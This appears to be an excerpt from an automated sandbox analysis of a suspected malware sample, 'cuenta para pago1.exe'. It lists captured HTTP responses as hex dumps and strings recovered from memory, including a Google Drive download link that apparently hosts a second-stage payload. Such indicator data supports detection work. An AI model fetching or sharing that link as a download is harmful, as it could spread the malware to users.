        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 14:10:01 GMTConnection: closeContent-Length: 4956Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 14:10:04 GMTConnection: closeContent-Length: 4956Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 14:10:07 GMTConnection: closeContent-Length: 4956Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 14:10:09 GMTConnection: closeContent-Length: 5105Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:10:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:10:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:10:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 14:10:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: cuenta para pago1.exe, 00000000.00000000.3658397167.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta para pago1.exe, 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmp, cuenta para pago1.exe, 00000002.00000000.3957453711.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: cuenta para pago1.exe, 00000002.00000002.4199743170.0000000004920000.00000004.00001000.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4198736310.000000000466E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd
        Source: cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFydmQx
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: cuenta para pago1.exe, 00000002.00000002.4198923341.0000000004688000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096502054.0000000004688000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096502054.000000000467A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4198923341.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download)
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=downloadw
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
